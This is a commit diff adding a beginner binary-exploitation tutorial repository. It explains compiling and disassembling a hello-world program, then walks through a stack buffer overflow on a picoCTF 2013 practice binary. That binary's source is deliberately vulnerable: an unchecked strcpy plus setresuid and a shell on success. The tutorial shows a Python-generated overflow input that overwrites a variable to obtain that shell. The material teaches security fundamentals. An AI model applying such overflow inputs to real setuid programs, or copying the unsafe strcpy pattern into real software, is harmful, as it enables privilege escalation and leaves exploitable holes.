Skip to content
28 changes: 26 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,2 +1,26 @@
# how2exploit_binary
An in depth tutorial on how to do binary exploitation
### A note from the creator
Greetings, fellow hacker, hobbyist, or computer enthusiast. If you've been
looking for a place to start learning binary exploitation, then you're in luck.
Written by someone who is just barely better than "incompetent," I'll be
explaining how I learned my skills. These tutorials will be a bit long winded,
but hopefully they will be informative and entertaining. Please feel free to
contact me about any clarifications that should be included in the tutorials.

**This is intended for linux. It's free if you don't already have it. Don't
want to dual boot? Get a VM.**

-Best of luck

bert88sta

#how2exploit_binary: get your hack on.

##Introductory Tutorials:

* [Intro 1: What is a binary, really?](intro-1)
* [Intro 2: Screwing around with the stack](intro-2)

##Buffer Overflows:

* [1: The power of SEGFAULT](overflow-1)
* [2: Build your own `system()`](overflow-2)
83 changes: 83 additions & 0 deletions intro-1/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,83 @@
#Intro 1: What is a binary, really?

In short, a binary is what happens when you take high level code such as C or
C++, and compile it into something the computer can actually run. I believe in
hands on learning, so we can take a look inside one to really find out.

Consider the file [hello_world.c](hello_world.c):
```C
#include<stdio.h>
int main() {
printf("Hello World!\n");
}
```

This is your average C file, more or less. It's got a main, some includes, and
a little bit of code to be run. However, your computer can't actually run it.
In order to make it usable, we can run:
```
$ gcc -m32 hello_world.c -o hello_world.bin
```
You can ignore the `-m32` argument (you'll learn about it later), but the
`-o hello_world.bin` simply specifies what the name of the output file is.

From here, we can execute it:
```
$ ./hello_world.bin
Hello World!
```
Unsurprisingly, we get "Hello World!" as the output. But let's go a bit deeper.
We can open gdb (GNU Debugger) and see what's happening under the hood:
```
$ gdb -q ./hello_world.bin
Reading symbols from ./hello_world.bin...(no debugging symbols found)...done.
gdb-peda$ disas main
Dump of assembler code for function main:
0x0804841d <+0>: push %ebp
0x0804841e <+1>: mov %esp,%ebp
0x08048420 <+3>: and $0xfffffff0,%esp
0x08048423 <+6>: sub $0x10,%esp
0x08048426 <+9>: movl $0x80484d0,(%esp)
0x0804842d <+16>: call 0x80482f0 <puts@plt>
0x08048432 <+21>: leave
0x08048433 <+22>: ret
End of assembler dump.
gdb-peda$ quit
```
Firstly, your prompt probably looks like `(gdb)`, whereas mine is `gdb-peda$`.
Don't worry about this, my gdb is modified.

The weird stuff that gdb showed us is called assembly language. It's
essentially the lowest level human readable code out there. Each line of that
code maps one to one with a machine instruction. Let me break this down for
you.

```
0x0804841d <+0>: push %ebp
0x0804841e <+1>: mov %esp,%ebp
0x08048420 <+3>: and $0xfffffff0,%esp
0x08048423 <+6>: sub $0x10,%esp
```
First, the numbers you see on the right are addresses. Just like your house
address, `0x0804841d` is where the instruction ` push %ebp` lives. These
first four instructions are just conventions for a function, in this case
`main()`.

```
0x08048426 <+9>: movl $0x80484d0,(%esp)
0x0804842d <+16>: call 0x80482f0 <puts@plt>
```

These instructions are what actually prints out our "Hello World!". The program
moves the address of the string "Hello World!" into the memory that `%esp`
points to. `%esp` is a register. It holds four bytes of information for quick
access, usually some address. Our program then calls `puts()`, which prints out
whatever is at the address we supplied.
```
0x08048432 <+21>: leave
0x08048433 <+22>: ret
```

Finally, these last two just pass control from our `main()` back to the C
library, which does some cleaning up and then exits. We'll be learning more
about how these binaries function in later tutorials.
Binary file added intro-1/hello_world.bin
Binary file not shown.
5 changes: 5 additions & 0 deletions intro-1/hello_world.c
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
#include<stdio.h>

int main() {
printf("Hello World!\n");
}
163 changes: 163 additions & 0 deletions intro-2/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,163 @@
#Intro 2: Screwing aroung with the stack.

**Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used
here.**

Now that you've gotten your feet wet with binaries, it's time to dive in
headfirst. Consider the file [overflow1.c]()
```C
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "dump_stack.h"

void vuln(int tmp, char *str) {
int win = tmp;
char buf[64];
strcpy(buf, str);
dump_stack((void **) buf, 23, (void **) &tmp);
printf("win = %d\n", win);
if (win == 1) {
execl("/bin/sh", "sh", NULL);
} else {
printf("Sorry, you lose.\n");
}
exit(0);
}

int main(int argc, char **argv) {
if (argc != 2) {
printf("Usage: stack_overwrite [str]\n");
return 1;
}

uid_t euid = geteuid();
setresuid(euid, euid, euid);
vuln(0, argv[1]);
return 0;
}
```
You can tell just by reading through it that the obvious objective here is to
make `win==1` a true statement, but we're going to ignore that for a few
minutes to learn about the stack. The stack is dynamic memory that the program
uses to store addresses, arguments, and all sorts of other goodies. For
example:
```
$ ./overflow1-3948d17028101c40
Usage: stack_overwrite [str]
$ ./overflow1-3948d17028101c40 AAAA
Stack dump:
0xffd48bf4: 0xffd4a89b (second argument)
0xffd48bf0: 0x00000000 (first argument)
0xffd48bec: 0x0804870f (saved eip)
0xffd48be8: 0xffd48c18 (saved ebp)
0xffd48be4: 0xf7720000
0xffd48be0: 0xf762caa7
0xffd48bdc: 0x00000000
0xffd48bd8: 0xffd48c44
0xffd48bd4: 0xf7744500
0xffd48bd0: 0xffd48c18
0xffd48bcc: 0x00000000
0xffd48bc8: 0x00000000
0xffd48bc4: 0xf7720000
0xffd48bc0: 0xffffffff
0xffd48bbc: 0xf760b216
0xffd48bb8: 0x000000c2
0xffd48bb4: 0xf757f698
0xffd48bb0: 0xf7751938
0xffd48bac: 0xf762cad4
0xffd48ba8: 0x000003e8
0xffd48ba4: 0x000003e8
0xffd48ba0: 0xffd48c00
0xffd48b9c: 0x41414141 (beginning of buffer)
win = 0
Sorry, you lose.
```
Now if you know a thing or two about ASCII, you'll know that 0x41 is the value
of "A". At the bottom of the stack dump, you'll notice that the beginning of
the buffer contains 0x41414141, or our four A's. Now we can run it again, only
this time we'll put a few more. Pay attention to the addresses on the left :)
```
/overflow1-3948d17028101c40 $(python -c 'print "A"*76')
Stack dump:
0xfff577d4: 0xfff58853 (second argument)
0xfff577d0: 0x00000000 (first argument)
0xfff577cc: 0x0804870f (saved eip)
0xfff577c8: 0xfff57700 (saved ebp)
0xfff577c4: 0x41414141
0xfff577c0: 0x41414141
0xfff577bc: 0x41414141
0xfff577b8: 0x41414141
0xfff577b4: 0x41414141
0xfff577b0: 0x41414141
0xfff577ac: 0x41414141
0xfff577a8: 0x41414141
0xfff577a4: 0x41414141
0xfff577a0: 0x41414141
0xfff5779c: 0x41414141
0xfff57798: 0x41414141
0xfff57794: 0x41414141
0xfff57790: 0x41414141
0xfff5778c: 0x41414141
0xfff57788: 0x41414141
0xfff57784: 0x41414141
0xfff57780: 0x41414141
0xfff5777c: 0x41414141 (beginning of buffer)
win = 1094795585
Sorry, you lose.
```
This bit: `$(python -c 'print "A"*76')` just makes python print out 76 "A"s.
Now you'll notice that the addresses on the left are completely different than
the first run. This is normal. Most binaries these days have ASLR enabled, a
protection that randomizes stack addresses from run to run. However, you might
notice that `win = 1094795585` according to the stack dump. What just happened?

Back to the source:
```C
char buf[64];
strcpy(buf, str);
```
Our buffer only holds 64 bytes. However, `strcpy()` is a dangerous function.
The buffer we provide contains 76 bytes. `strcpy()` doesn't care about checking
lengths. Instead, those extra 12 bytes that don't fit just get thrown onto the
stack. The value of `win` was stored right next to our buffer, so let's try to
set `win=1.` This is where things get a bit tricky. "1", as in the string, is
0x30. We need to submit 0x1, which isn't printable. Since `win` is right next
to our buffer on the stack, we can just submit 64 "A"s, followed by one "\x01"
to leak into the last byte of `win`.
```
$ ./overflow1-3948d17028101c40 $(python -c 'print "A"*64 + "\x01"')
Stack dump:
0xffe29f04: 0xffe2b85e (second argument)
0xffe29f00: 0x00000000 (first argument)
0xffe29efc: 0x0804870f (saved eip)
0xffe29ef8: 0xffe29f28 (saved ebp)
0xffe29ef4: 0xf7760000
0xffe29ef0: 0xf766caa7
0xffe29eec: 0x00000001
0xffe29ee8: 0x41414141
0xffe29ee4: 0x41414141
0xffe29ee0: 0x41414141
0xffe29edc: 0x41414141
0xffe29ed8: 0x41414141
0xffe29ed4: 0x41414141
0xffe29ed0: 0x41414141
0xffe29ecc: 0x41414141
0xffe29ec8: 0x41414141
0xffe29ec4: 0x41414141
0xffe29ec0: 0x41414141
0xffe29ebc: 0x41414141
0xffe29eb8: 0x41414141
0xffe29eb4: 0x41414141
0xffe29eb0: 0x41414141
0xffe29eac: 0x41414141 (beginning of buffer)
win = 1
$ ls
overflow1-3948d17028101c40 overflow1-3948d17028101c40.c README.md
$ exit
```

If you try this for yourself, you'll get a shell. You sucessfully have
manipulated the stack to give you what you want.
Binary file added intro-2/overflow1-3948d17028101c40
Binary file not shown.
32 changes: 32 additions & 0 deletions intro-2/overflow1-3948d17028101c40.c
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "dump_stack.h"

void vuln(int tmp, char *str) {
int win = tmp;
char buf[64];
strcpy(buf, str);
dump_stack((void **) buf, 23, (void **) &tmp);
printf("win = %d\n", win);
if (win == 1) {
execl("/bin/sh", "sh", NULL);
} else {
printf("Sorry, you lose.\n");
}
exit(0);
}

int main(int argc, char **argv) {
if (argc != 2) {
printf("Usage: stack_overwrite [str]\n");
return 1;
}

uid_t euid = geteuid();
setresuid(euid, euid, euid);
vuln(0, argv[1]);
return 0;
}
Loading